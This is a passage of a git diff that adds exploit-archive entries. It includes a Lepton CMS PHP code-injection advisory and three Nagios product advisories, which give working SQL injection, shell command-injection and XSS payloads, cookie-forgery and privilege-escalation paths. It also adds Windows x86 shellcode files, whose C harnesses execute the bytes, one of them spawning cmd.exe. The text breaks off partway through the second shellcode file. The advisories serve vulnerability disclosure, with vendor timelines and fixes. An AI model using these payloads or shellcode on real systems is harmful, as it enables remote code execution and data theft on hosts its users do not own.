this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. + +HYP3RLINX diff --git a/platforms/php/webapps/40248.txt b/platforms/php/webapps/40248.txt new file mode 100755 index 000000000..879541cec --- /dev/null +++ b/platforms/php/webapps/40248.txt @@ -0,0 +1,141 @@ +[+] Credits: John Page (HYP3RLINX) + +[+] Website: hyp3rlinx.altervista.org + +[+] Source: +http://hyp3rlinx.altervista.org/advisories/LEPTON-PHP-CODE-INJECTION.txt + +[+] ISR: ApparitionSec + + + +Vendor: +================== +www.lepton-cms.org + + + +Product: +================================= +Lepton CMS 2.2.0 / 2.2.1 (update) + +LEPTON is an easy-to-use but full customizable Content Management System +(CMS). + + + + +Vulnerability Type: +=================== +PHP Code Injection + + + +CVE Reference: +============== +N/A + + + +Vulnerability Details: +===================== + +No input validation check is done on the "Database User" input field when +entering Lepton CMS setup information using the Install Wizard. +Therefore, a malicious user can input whatever they want in "config.php", +this can allow for PHP Remote Command Execution on the Host system. + +e.g. + +In the database username field, single quote to close "DB_USERNAME" value +then open our own PHP tags. + +');?> + +Now in "config.php" the Database username becomes ===> +define('DB_USERNAME', '');?>'); + +A security check attempt is made by Lepton to disallow making multiple HTTP +requests for "config.php". On line 3 of "config.php" file we find. + +/////////////////////////////////////////////////////////////////////////////////////////////////////// + +if(defined('LEPTON_PATH')) { die('By security reasons it is not permitted +to load \'config.php\' twice!! +Forbidden call from \''.$_SERVER['SCRIPT_NAME'].'\'!'); } + +/////////////////////////////////////////////////////////////////////////////////////////////////////////// + +However, the security check is placed on line 3 way before "LEPTON_PATH" +has been defined allowing complete bypass of that access control check. +Now we can inject our own PHP code into the config allowing Remote Command +Execution or Local/Remote File Includes etc... + +Next, make HTTP GET request to "http://victim-server/upload/install/save.php" +again and code execution will be achieved or request "config.php" +directly as the security check made on line 3 of "config.php" to prevent +multiple HTTP requests to "config.php" does NOT work anyhow. + +In situations where an installation script is provided as part of a some +default image often available as a convenience by hosting providers, this +can +be used to gain code execution on the target system and bypass whatever +security access controls/restrictions etc. + +References: +http://www.lepton-cms.org/posts/important-lepton-2.2.2-93.php + + +Exploit code(s): +=============== + +1) At step 4 of Leptons Install Wizard, enter ');?> for Database User name, then fill in rest of fields + +2) Click go to step 5 and fill in required fields, then click "Install +LEPTON" + +3) Make HTTP GET request to: + + http://localhost/LEPTON_stable_2.2.0/upload/install/save.php + + OR + + http://localhost/LEPTON_stable_2.2.0/upload/config.php + + +BOOM pop calc.exe... + + + +Disclosure Timeline: +=========================================================== +Attempted Vendor Notification: June 11, 2016 (No replies) +Vendor Notification on July 12, 2016 ( thanks Henri Salo ) +Vendor Acknowledgement: July 13, 2016 +Vendor fixes: July 14, 2016 +Vendor release version 2.2.2 : August 12, 2016 +August 15, 2016 : Public Disclosure + + + + +Severity Level: +================ +High + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no +warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, +provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in +vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the +information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author +prohibits any malicious use of security related information +or exploits by the author or elsewhere. + +HYP3RLINX diff --git a/platforms/php/webapps/40250.txt b/platforms/php/webapps/40250.txt new file mode 100755 index 000000000..b91d7e51a --- /dev/null +++ b/platforms/php/webapps/40250.txt @@ -0,0 +1,170 @@ +( , ) (, + . '.' ) ('. ', + ). , ('. ( ) ( + (_,) .'), ) _ _, + / _____/ / _ \ ____ ____ _____ + \____ \==/ /_\ \ _/ ___\/ _ \ / \ + / \/ | \\ \__( <_> ) Y Y \ +/______ /\___|__ / \___ >____/|__|_| / + \/ \/.-. \/ \/:wq + (x.0) + '=.|w|.=' + _=''"''=. + + presents.. + +Nagios Log Server Multiple Vulnerabilities +Affected versions: Nagios Log Server <= 1.4.1 + +PDF: +http://www.security-assessment.com/files/documents/advisory/NagiosLogServerAdvisory.pdf + ++-----------+ +|Description| ++-----------+ +The Nagios Log Server application is affected by multiple security +vulnerabilities, including authentication bypass, stored cross-site +scripting, inconsistent authorization controls and privilege escalation. + +These vulnerabilities can be chained together to obtain unauthenticated +remote code execution in the context of the root user. + + ++------------+ +|Exploitation| ++------------+ +==Authentication Bypass== +Authentication for the Nagios Log Server web management interface can be +bypassed due to an insecure implementation of the function validating +session cookies within the ‘Session.php’ file. As shown below, the +application uses a base64 encoded serialized PHP string along with a +SHA1 HMAC checksum as the cookie to authenticate and manage user +sessions. A sample cookie format is shown below: + +a:11:{s:10:"session_id";s:32:"4a6dad39cec8d6a5ef5a1a1d231bf9fa";s:10:"ip_address";s:15:"123.123.123.123"; +s:10:"user_agent";s:72:"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0) +Gecko/20100101 Firefox/46.0"; +s:13:"last_activity";i:1463700310;s:9:"user_data";s:0:"";s:7:"user_id";s:1:"1";s:8:"username";s:4:"user"; +s:5:"email";s:16:"test@example.com";s:12:"ls_logged_in";i:1;s:10:"apisession";i:1;s:8:"language";s:7:"default";} + +The application relies on the validation against the SHA1 HMAC to +recognize and destroy invalid session cookies when the checksum value +does not match. However the encryption key used to generate the HMAC +checksum is statically set to the SHA1 hash value of the +$_SERVER['HTTP_HOST'] PHP variable, which is the Host HTTP header value. +This information can be controlled by the attacker and as such should +not be considered a secure randomly generated value for the secret +encryption key. + +Since no further verification is performed for other non-predictable +fields (e.g. session_id, apikey, email, username etc.) and only a valid +user agent string matching the correct HTTP header value is required, an +attacker can forge arbitrary session cookies and bypass authentication. + +The script on the following page generates session cookies which are +accepted and validated successfully by the application. A ‘user_id’ +value of 1 can be used to initiate a session in the context of the admin +user. + +[POC - nagiosls_forge_cookie.php] + + + +This vulnerability is present across multiple Nagios products. + + +==Stored Cross-Site Scripting== +The Nagios Log Server application does not validate and HTML encode log +data sent by configured sources. This issue is aggravated by the fact +that the application does not maintain a list of authorized log sources, +but instead accept data from any host connecting to the Nagios Log +Server port responsible of collecting logs (TCP 5544). An attacker can +exploit this vulnerability to send malicious JavaScript code and execute +it in the context of Nagios Log Server user session as shown below. + +[POC STORED XSS] +# echo '' | nc [TARGET IP] 5544 + +The payload gets rendered under '/nagioslogserver/dashboard'. + +==Inconsistent Authorization Controls== +The Nagios Log Server application provides intended functionality to +define custom alert commands using different configuration options. By +default, only administrative users can define alert commands which +execute scripts on the Log Server filesystem when an alert is triggered. + +However, the application does not properly enforce authorization checks +and an attacker can access the same functionality in the context of a +standard user session by providing the correct payload in the ‘alert’ +POST parameter. This functionality can be abused to obtain remote code +execution on the target system as the application does not restrict the +script definition to a single folder and an attacker can specify +absolute paths to any script or executable file present on the Log +Server host. + +[POC - CREATE COMMAND EXECUTION ALERT] +URL => /nagioslogserver/api/check/create/1 +Method => POST +Payload => +alert={"name"%3a"StduserAlertTest","check_interval"%3a"1m","lookback_period"%3a"1m","warning"%3a"1", +"critical"%3a"1","method"%3a{"type"%3a"exec","path"%3a"/bin/touch", +"args"%3a"/tmp/STDUSER"},"alert_crit_only"%3a0,"created_by"%3a"stduser","query_id"%3a"AVTLGmd-GYGKrkWMo5Tc"} + + +==Privilege Escalation== +The default Log Server application sudoers configuration allows the +‘apache’ user to run the ‘get_logstash_ports.sh’ script as root without +being prompted for a password. However insecure file write permissions +have been granted to the 'nagios' group for the ‘get_logstash_ports.sh’ +script file. Since the apache user is a member of the 'nagios' group, an +attacker can overwrite the script contents with arbitrary data. + +Details about the script with insecure permissions are provided below: +PATH => /usr/local/nagioslogserver/scripts/get_logstash_ports.sh +PERMISSIONS => rwxrwxr-x nagios nagios + + ++----------+ +| Solution | ++----------+ +Upgrade to Nagios Log Server 1.4.2 + + ++------------+ +| Timeline | ++------------+ +2/06/2016 – Initial disclosure to vendor +3/06/2016 – Vendor acknowledges receipt of advisory +22/07/2016 – Vendor releases patched software version +11/08/2016 – Public disclosure + + ++------------+ +| Additional | ++------------+ +Further information is available in the accompanying PDF. +http://www.security-assessment.com/files/documents/advisory/NagiosLogServerAdvisory.pdf \ No newline at end of file diff --git a/platforms/php/webapps/40251.txt b/platforms/php/webapps/40251.txt new file mode 100755 index 000000000..062293b3e --- /dev/null +++ b/platforms/php/webapps/40251.txt @@ -0,0 +1,191 @@ +( , ) (, + . '.' ) ('. ', + ). , ('. ( ) ( + (_,) .'), ) _ _, + / _____/ / _ \ ____ ____ _____ + \____ \==/ /_\ \ _/ ___\/ _ \ / \ + / \/ | \\ \__( <_> ) Y Y \ +/______ /\___|__ / \___ >____/|__|_| / + \/ \/.-. \/ \/:wq + (x.0) + '=.|w|.=' + _=''"''=. + + presents.. + +Nagios Network Analyzer Multiple Vulnerabilities +Affected versions: Nagios Network Analyzer <= 2.2.0 + +PDF: +http://www.security-assessment.com/files/documents/advisory/NagiosNetworkAnalyzerAdvisory.pdf + ++-----------+ +|Description| ++-----------+ +The Nagios Network Analyzer application is affected by multiple security +vulnerabilities, including authentication bypass, SQL injection, +arbitrary code execution via command injection and privilege escalation. + +These vulnerabilities can be chained together to obtain unauthenticated +remote code execution in the context of the root user. + ++------------+ +|Exploitation| ++------------+ +==Authentication Bypass== +Authentication for the Nagios Network Analyzer web management interface +can be bypassed due to an insecure implementation of the function +validating session cookies within the ‘Session.php’ file. As shown +below, the application uses a base64 encoded serialized PHP string along +with a SHA1 HMAC checksum as the cookie to authenticate and manage user +sessions. A sample cookie format is shown below: + + a:15:{s:10:"session_id";s:32:"325672f137d4e3747a0f9e61a4c867b2";s:10:"ip_address";s:15:"192.168.xxx.xxx"; + s:10:"user_agent";s:72:"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0) +Gecko/20100101 Firefox/46.0";s:13:"last_activity"; + i:1463165417;s:9:"user_data";s:0:"";s:8:"identity";s:11:"nagiosadmin";s:8:"username";s:11:"nagiosadmin";s:5:"email"; + s:30:"xxxxxx@security-assessment.com";s:7:"user_id";s:1:"1";s:14:"old_last_login";s:10:"1463163525";s:9:"apiaccess"; + s:1:"1";s:6:"apikey";s:40:"6ba11d3f6e84011b3332d7427d0655de64f11d5e";s:8:"language";s:7:"default";s:10:"apisession"; + b:1;s:7:"view_id";i:0;} + +The application relies on the validation against the SHA1 HMAC to +recognize and destroy invalid session cookies when the checksum value +does not match. However the encryption key used to generate the HMAC +checksum is statically set to the SHA1 hash value of the +$_SERVER['HTTP_HOST'] PHP variable, which is the Host HTTP header value. +This information can be controlled by the attacker and as such should +not be considered a secure randomly generated value for the secret +encryption key. + +Since no further verification is performed for other non-predictable +fields (e.g. session_id, apikey, email, username etc.) and only a valid +user agent string matching the correct HTTP header value is required, an +attacker can forge arbitrary session cookies and bypass authentication. + +The script on the following page generates session cookies which are +accepted and validated successfully by the application. A ‘user_id’ +value of 1 can be used to initiate a session in the context of the admin +user. + +[POC - nagiosna_forge_cookie.php] + + +This vulnerability is present across multiple Nagios products. + + +==SQL Injection== +Multiple SQL injection vulnerabilities exist in the application web +management interface. An attacker can exploit this vulnerabilities to +retrieve sensitive data from the application MySQL database. + +URL => +/nagiosna/index.php/api/checks/read?q%5Blastcode%5D=0&o%5Bcol%5D=&o%5Bsort%5D=ASC +Method => GET +Parameter => o[col] +POC Payload => name AND (SELECT * FROM (SELECT(SLEEP(5)))UtTW) + +URL => +/nagiosna/index.php/api/sources/read?o%5Bcol%5D=&o%5Bsort%5D=ASC +Method => GET +Parameter => o[col] +POC Payload => name AND (SELECT * FROM (SELECT(SLEEP(5)))UtTW) + +URL => /nagiosna/index.php/admin/globals +Method => POST +Parameter => timezone +POC Payload => US/Eastern%' AND (SELECT 4646 FROM(SELECT +COUNT(*),CONCAT(0x232323,(SELECT MID((IFNULL(CAST(apikey AS +CHAR),0x20)),1,54) FROM nagiosna_users WHERE id=1 LIMIT +0,1),0x232323,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS +GROUP BY x)a) AND '%'='' + + +==Command Injection== +A command injection vulnerability exists in the function generating PDF +reports for download. Base64 encoded user-supplied input is passed as an +argument to system shell calls without being escaped. An attacker can +inject arbitrary shell commands and obtain remote code execution in the +context of the apache user. + +URL => /nagiosna/index.php/download/report/sourcegroup// +Method => GET +POC Payload => q[rid]=5&q[gid]=1" "";{touch,/tmp/TESTFILE};echo " + +URL => /nagiosna/index.php/download/report/source// +Method => GET +POC Payload => q[rid]=5&q[gid]=1" "";{touch,/tmp/TESTFILE};echo " + +Arbitrary code execution in the context of the ‘nna’ user can also be +obtained by abusing the intended functionality to define custom alert +commands. As shown in the next section, this exposes the application to +additional privilege escalation attack vectors. + + +==Privilege Escalation== +The default application sudoers configuration allows the ‘apache’ and +‘nna’ users to run multiple Bash and Python scripts as root without +being prompted for a password. The 'apache' user is in the 'nnacmd' +group, which has insecure write permissions to multiple script files. An +attacker can overwrite their contents with a malicious payload (i.e. +spawn a shell) and escalate privileges to root. + +The script files with insecure permissions are listed below: + +PATH => /usr/local/nagiosna/bin/rc.py +PERMISSIONS => rwxrwxr-t nna nnacmd + +PATH => /usr/local/nagiosna/scripts/change_timezone.sh +PERMISSIONS => rwsrwsr-t nna nnacmd + +PATH => /usr/local/nagiosna/scripts/upgrade_to_latest.sh +PERMISSIONS => rwsrwsr-t nna nnacmd + + ++----------+ +| Solution | ++----------+ +Upgrade to Nagios Network Analyzer 2.2.2. + + ++------------+ +| Timeline | ++------------+ +2/06/2016 – Initial disclosure to vendor +3/06/2016 – Vendor acknowledges receipt of advisory +3/06/2016 – Vendor releases new software build (2.2.1) +8/07/2016 – Inform vendor about insecure fix (generation of encryption +key based on epoch) +9/07/2016 – Vendor confirms issue and replies with new fix +01/08/2016 – Vendor releases patched software version +11/08/2016 – Public disclosure + + ++------------+ +| Additional | ++------------+ +Further information is available in the accompanying PDF. +http://www.security-assessment.com/files/documents/advisory/NagiosNetworkAnalyzerAdvisory.pdf \ No newline at end of file diff --git a/platforms/php/webapps/40252.txt b/platforms/php/webapps/40252.txt new file mode 100755 index 000000000..eddfab579 --- /dev/null +++ b/platforms/php/webapps/40252.txt @@ -0,0 +1,124 @@ +( , ) (, + . '.' ) ('. ', + ). , ('. ( ) ( + (_,) .'), ) _ _, + / _____/ / _ \ ____ ____ _____ + \____ \==/ /_\ \ _/ ___\/ _ \ / \ + / \/ | \\ \__( <_> ) Y Y \ +/______ /\___|__ / \___ >____/|__|_| / + \/ \/.-. \/ \/:wq + (x.0) + '=.|w|.=' + _=''"''=. + + presents.. + +Nagios Incident Manager Multiple Vulnerabilities +Affected versions: Nagios Incident Manager <= 2.0.0 + +PDF: +http://www.security-assessment.com/files/documents/advisory/NagiosIncidentManager.pdf + ++-----------+ +|Description| ++-----------+ +The Nagios Incident Manager application is vulnerable to multiple +vulnerabilities, including remote code execution via command injection, +SQL injection and stored cross-site scripting. + + ++------------+ +|Exploitation| ++------------+ +==Command Injection== +Multiple command injection vulnerabilities exist within the incident +report file generation functionality as user input is passed to system +shell calls without validation. A limited non-administrative user, who +by default does not have permissions to add custom MIME types for +incident file attachments, can exploit these vulnerabilities to obtain +remote code execution on the Incident Manager system as the ‘apache’ user. + +URL => /nagiosim/reports/download//mttr/ +Method => GET +POC Payload => start_date=2016-05-06&end_date=2016-05-06&types[]=2" +"";{touch,/tmp/MYFILE};echo + +URL => /nagiosim/reports/download//closed/ +Method => GET +POC Payload => start_date=2016-05-06&end_date=2016-05-06&types[]=2" +"";{touch,/tmp/MYFILE};echo + +URL => /nagiosim/reports/download//first_response/ +Method => GET +POC Payload => start_date=2016-05-06&end_date=2016-05-06&types[]=2" +"";{touch,/tmp/MYFILE};echo + +URL => /nagiosim/reports/download//general/ +Method => GET +POC Payload => start_date=2016-05-06&end_date=2016-05-06&types[]=2" +"";{touch,/tmp/MYFILE};echo + + +==SQL Injection== +The Nagios IM admin functionality to update the application settings is +vulnerable to an SQL Injection vulnerability via error-based payloads. +An attacker can inject into the ‘timezone’ POST parameter and retrieve +sensitive information from the application MySQL database. + +URL => /nagiosim/admin/settings +Method => POST +Parameter => timezone +Payload => Pacific/Samoa' AND (SELECT 5323 FROM(SELECT +COUNT(*),CONCAT(0x717a7a7171,(MID((IFNULL(CAST(DATABASE() AS +CHAR),0x20)),1,54)),0x7170786a71,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ' + + +==Stored Cross-Site Scripting== +Multiple stored cross-scripting vulnerabilities exist in the Nagios IM +web interface, allowing a standard user to insert malicious JavaScript +payloads into administrative and non-administrative application +functionality. This attack vector could be used by an authenticated +attacker with standard user privileges to hijack the session of an admin +user and extend their permissions within the application (e.g. adding +PHP as a valid MIME type for file attachments). + +URL => /nagiosim/incidents/add +Method => POST +Parameters => title, summary, priority, file_description, status +Render => /nagiosim/incidents, /nagiosim/incidents/details/ +POC Payload => + +URL => /nagiosim/api/incidents//messages +Method => POST +Parameters => title +Render => /nagiosim/incidents/details/ +POC Payload => + +URL => /nagiosim/profile +Method => POST +Parameters => username, first_name, last_name +Render => /nagiosim/admin/users, Global Menu Banner (username) +POC Payload => + ++----------+ +| Solution | ++----------+ +Upgrade to Nagios Incident Manager 2.0.1 + + ++------------+ +| Timeline | ++------------+ +2/06/2016 - Initial disclosure to vendor +3/06/2016 - Vendor acknowledges receipt of advisory +8/07/2016 - Vendor releases patched software version (2.0.1) +11/08/2016 – Public disclosure + + + ++------------+ +| Additional | ++------------+ +Further information is available in the accompanying PDF. +http://www.security-assessment.com/files/documents/advisory/NagiosIncidentManager.pdf \ No newline at end of file diff --git a/platforms/win_x86/shellcode/40245.c b/platforms/win_x86/shellcode/40245.c new file mode 100755 index 000000000..d265601b9 --- /dev/null +++ b/platforms/win_x86/shellcode/40245.c @@ -0,0 +1,273 @@ +/* + # Title : Windows x86 MessageBoxA shellcode + # Author : Roziul Hasan Khan Shifat + # Date : 14-08-2016 + # Tested On : Windows 7 starter x86 +*/ + + +/* +Disassembly of section .text: + +00000000 <_start>: + 0: 31 c9 xor %ecx,%ecx + 2: 64 8b 41 30 mov %fs:0x30(%ecx),%eax + 6: 8b 40 0c mov 0xc(%eax),%eax + 9: 8b 70 14 mov 0x14(%eax),%esi + c: ad lods %ds:(%esi),%eax + d: 96 xchg %eax,%esi + e: ad lods %ds:(%esi),%eax + f: 8b 48 10 mov 0x10(%eax),%ecx + 12: 31 db xor %ebx,%ebx + 14: 8b 59 3c mov 0x3c(%ecx),%ebx + 17: 01 cb add %ecx,%ebx + 19: 8b 5b 78 mov 0x78(%ebx),%ebx + 1c: 01 cb add %ecx,%ebx + 1e: 8b 73 20 mov 0x20(%ebx),%esi + 21: 01 ce add %ecx,%esi + 23: 31 d2 xor %edx,%edx + +00000025 : + 25: 42 inc %edx + 26: ad lods %ds:(%esi),%eax + 27: 01 c8 add %ecx,%eax + 29: 81 38 47 65 74 50 cmpl $0x50746547,(%eax) + 2f: 75 f4 jne 25 + 31: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax) + 38: 75 eb jne 25 + 3a: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax) + 41: 75 e2 jne 25 + 43: 8b 73 1c mov 0x1c(%ebx),%esi + 46: 01 ce add %ecx,%esi + 48: 8b 14 96 mov (%esi,%edx,4),%edx + 4b: 01 ca add %ecx,%edx + 4d: 89 d6 mov %edx,%esi + 4f: 89 cf mov %ecx,%edi + 51: 31 db xor %ebx,%ebx + 53: 53 push %ebx + 54: 68 61 72 79 41 push $0x41797261 + 59: 68 4c 69 62 72 push $0x7262694c + 5e: 68 4c 6f 61 64 push $0x64616f4c + 63: 54 push %esp + 64: 51 push %ecx + 65: ff d2 call *%edx + 67: 83 c4 10 add $0x10,%esp + 6a: 31 c9 xor %ecx,%ecx + 6c: 68 6c 6c 42 42 push $0x42426c6c + 71: 88 4c 24 02 mov %cl,0x2(%esp) + 75: 68 33 32 2e 64 push $0x642e3233 + 7a: 68 75 73 65 72 push $0x72657375 + 7f: 54 push %esp + 80: ff d0 call *%eax + 82: 83 c4 0c add $0xc,%esp + 85: 31 c9 xor %ecx,%ecx + 87: 68 6f 78 41 42 push $0x4241786f + 8c: 88 4c 24 03 mov %cl,0x3(%esp) + 90: 68 61 67 65 42 push $0x42656761 + 95: 68 4d 65 73 73 push $0x7373654d + 9a: 54 push %esp + 9b: 50 push %eax + 9c: ff d6 call *%esi + 9e: 83 c4 0c add $0xc,%esp + a1: 31 d2 xor %edx,%edx + a3: 31 c9 xor %ecx,%ecx + a5: 52 push %edx + a6: 68 73 67 21 21 push $0x21216773 + ab: 68 6c 65 20 6d push $0x6d20656c + b0: 68 53 61 6d 70 push $0x706d6153 + b5: 8d 14 24 lea (%esp),%edx + b8: 51 push %ecx + b9: 68 68 65 72 65 push $0x65726568 + be: 68 68 69 20 54 push $0x54206968 + c3: 8d 0c 24 lea (%esp),%ecx + c6: 31 db xor %ebx,%ebx + c8: 43 inc %ebx + c9: 53 push %ebx + ca: 52 push %edx + cb: 51 push %ecx + cc: 31 db xor %ebx,%ebx + ce: 53 push %ebx + cf: ff d0 call *%eax + d1: 31 c9 xor %ecx,%ecx + d3: 68 65 73 73 41 push $0x41737365 + d8: 88 4c 24 03 mov %cl,0x3(%esp) + dc: 68 50 72 6f 63 push $0x636f7250 + e1: 68 45 78 69 74 push $0x74697845 + e6: 8d 0c 24 lea (%esp),%ecx + e9: 51 push %ecx + ea: 57 push %edi + eb: ff d6 call *%esi + ed: 31 c9 xor %ecx,%ecx + ef: 51 push %ecx + f0: ff d0 call *%eax +*/ + + +/* +section .text + global _start +_start: + +xor ecx,ecx +mov eax,[fs:ecx+0x30] ;PEB +mov eax,[eax+0xc] ;PEB->Ldr +mov esi,[eax+0x14] ;PEB->ldr.InMemOrderModuleList +lodsd +xchg esi,eax +lodsd +mov ecx,[eax+0x10] ;kernel32 base address + + +xor ebx,ebx +mov ebx,[ecx+0x3c] ;DOS->elf_anew +add ebx,ecx +mov ebx,[ebx+0x78] ;DataDirectory->VirtualAddress +add ebx,ecx ;IMAGE_EXPORT_DIRECTORY + +mov esi,[ebx+0x20] ;AddressOfNames +add esi,ecx + +;-------------------------------------------------- + + +xor edx,edx +g: +inc edx +lodsd +add eax,ecx +cmp dword [eax],'GetP' +jnz g +cmp dword [eax+4],'rocA' +jnz g +cmp dword [eax+8],'ddre' +jnz g + + +;----------------------------------------------------- + +mov esi,[ebx+0x1c] ;AddressOfFunctions +add esi,ecx +;--------------------------------- + + +mov edx,[esi+edx*4] +add edx,ecx ;GetProcAddress() + +;------------------ +mov esi,edx +mov edi,ecx +;-------------------- + +;finding address of LoadLibraryA() +xor ebx,ebx +push ebx +push 0x41797261 +push 0x7262694c +push 0x64616f4c + + +push esp +push ecx + +call edx + +add esp,16 +;--------------------------- +xor ecx,ecx + +;LoadLibraryA("user32.dll") +push 0x42426c6c +mov [esp+2],byte cl +push 0x642e3233 +push 0x72657375 + + +push esp +call eax + +;------------------------- + +;Finding address of MessageBoxA() +add esp,12 +xor ecx,ecx +push 0x4241786f +mov [esp+3],byte cl +push 0x42656761 +push 0x7373654d + +push esp +push eax + +call esi + +;--------------------------------- +add esp,12 + +;---------------- +;MessageBoxA(NULL,"Sample msg!!","hi There",1) + +xor edx,edx +xor ecx,ecx + + +push edx +push 0x21216773 +push 0x6d20656c +push 0x706d6153 + +lea edx,[esp] ; "Sample msg!!" + +push ecx +push 0x65726568 +push 0x54206968 + +lea ecx,[esp] ; "hi There" + +xor ebx,ebx + +inc ebx + + +push ebx +push edx +push ecx +xor ebx,ebx +push ebx + +call eax + + +;---------------------- +xor ecx,ecx +push 0x41737365 +mov [esp+3],byte cl +push 0x636f7250 +push 0x74697845 + + +lea ecx,[esp] + + +push ecx +push edi + +call esi + +;--------------- +xor ecx,ecx +push ecx +call eax +*/ + + +#include +#include +char shellcode[]=\ + +"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x31\xdb\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x89\xd6\x89\xcf\x31\xdb\x53\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x51\xff\xd2\x83\xc4\x10\x31\xc9\x68\x6c\x6c\x42\x42\x88\x4c\x24\x02\x68\x33\x32\x2e\x64\x68\x75\x73\x65\x72\x54\xff\xd0\x83\xc4\x0c\x31\xc9\x68\x6f\x78\x41\x42\x88\x4c\x24\x03\x68\x61\x67\x65\x42\x68\x4d\x65\x73\x73\x54\x50\xff\xd6\x83\xc4\x0c\x31\xd2\x31\xc9\x52\x68\x73\x67\x21\x21\x68\x6c\x65\x20\x6d\x68\x53\x61\x6d\x70\x8d\x14\x24\x51\x68\x68\x65\x72\x65\x68\x68\x69\x20\x54\x8d\x0c\x24\x31\xdb\x43\x53\x52\x51\x31\xdb\x53\xff\xd0\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x0c\x24\x51\x57\xff\xd6\x31\xc9\x51\xff\xd0"; + +main() +{ +printf("shellcode lenght %ld\n",(long)strlen(shellcode)); +(* (int(*)()) shellcode) (); +} diff --git a/platforms/win_x86/shellcode/40246.c b/platforms/win_x86/shellcode/40246.c new file mode 100755 index 000000000..ddfe6c341 --- /dev/null +++ b/platforms/win_x86/shellcode/40246.c @@ -0,0 +1,328 @@ +/* + # Title : Windows x86 CreateProcessA(NULL,"cmd.exe",NULL,NULL,0,NULL,NULL,NULL,&STARTUPINFO,&PROCESS_INFORMATION) shellcode + # Author : Roziul Hasan Khan Shifat + # Date : 15-08-2016 + # Tested On : Windows 7 x86 +*/ + + +/* +Disassembly of section .text: + +00000000 <_start>: + 0: 31 c9 xor %ecx,%ecx + 2: 64 8b 41 30 mov %fs:0x30(%ecx),%eax + 6: 8b 40 0c mov 0xc(%eax),%eax + 9: 8b 70 14 mov 0x14(%eax),%esi + c: ad lods %ds:(%esi),%eax + d: 96 xchg %eax,%esi + e: ad lods %ds:(%esi),%eax + f: 8b 48 10 mov 0x10(%eax),%ecx + 12: 31 db xor %ebx,%ebx + 14: 8b 59 3c mov 0x3c(%ecx),%ebx + 17: 01 cb add %ecx,%ebx + 19: 8b 5b 78 mov 0x78(%ebx),%ebx + 1c: 01 cb add %ecx,%ebx + 1e: 8b 73 20 mov 0x20(%ebx),%esi + 21: 01 ce add %ecx,%esi + 23: 31 d2 xor %edx,%edx + +00000025 : + 25: 42 inc %edx + 26: ad lods %ds:(%esi),%eax + 27: 01 c8 add %ecx,%eax + 29: 81 38 47 65 74 50 cmpl $0x50746547,(%eax) + 2f: 75 f4 jne 25 + 31: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax) + 38: 75 eb jne 25 + 3a: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax) + 41: 75 e2 jne 25 + 43: 8b 73 1c mov 0x1c(%ebx),%esi + 46: 01 ce add %ecx,%esi + 48: 8b 14 96 mov (%esi,%edx,4),%edx + 4b: 01 ca add %ecx,%edx + 4d: 89 d6 mov %edx,%esi + 4f: 89 cf mov %ecx,%edi + 51: 31 db xor %ebx,%ebx + 53: 68 79 41 41 41 push $0x41414179 + 58: 66 89 5c 24 01 mov %bx,0x1(%esp) + 5d: 68 65 6d 6f 72 push $0x726f6d65 + 62: 68 65 72 6f 4d push $0x4d6f7265 + 67: 68 52 74 6c 5a push $0x5a6c7452 + 6c: 54 push %esp + 6d: 51 push %ecx + 6e: ff d2 call *%edx + 70: 83 c4 10 add $0x10,%esp + 73: 31 c9 xor %ecx,%ecx + 75: 89 ca mov %ecx,%edx + 77: b2 54 mov $0x54,%dl + 79: 51 push %ecx + 7a: 83 ec 54 sub $0x54,%esp + 7d: 8d 0c 24 lea (%esp),%ecx + 80: 51 push %ecx + 81: 52 push %edx + 82: 51 push %ecx + 83: ff d0 call *%eax + 85: 59 pop %ecx + 86: 31 d2 xor %edx,%edx + 88: 68 73 41 42 42 push $0x42424173 + 8d: 66 89 54 24 02 mov %dx,0x2(%esp) + 92: 68 6f 63 65 73 push $0x7365636f + 97: 68 74 65 50 72 push $0x72506574 + 9c: 68 43 72 65 61 push $0x61657243 + a1: 8d 14 24 lea (%esp),%edx + a4: 51 push %ecx + a5: 52 push %edx + a6: 57 push %edi + a7: ff d6 call *%esi + a9: 59 pop %ecx + aa: 83 c4 10 add $0x10,%esp + ad: 31 db xor %ebx,%ebx + af: 68 65 78 65 41 push $0x41657865 + b4: 88 5c 24 03 mov %bl,0x3(%esp) + b8: 68 63 6d 64 2e push $0x2e646d63 + bd: 8d 1c 24 lea (%esp),%ebx + c0: 31 d2 xor %edx,%edx + c2: b2 44 mov $0x44,%dl + c4: 89 11 mov %edx,(%ecx) + c6: 8d 51 44 lea 0x44(%ecx),%edx + c9: 56 push %esi + ca: 31 f6 xor %esi,%esi + cc: 52 push %edx + cd: 51 push %ecx + ce: 56 push %esi + cf: 56 push %esi + d0: 56 push %esi + d1: 56 push %esi + d2: 56 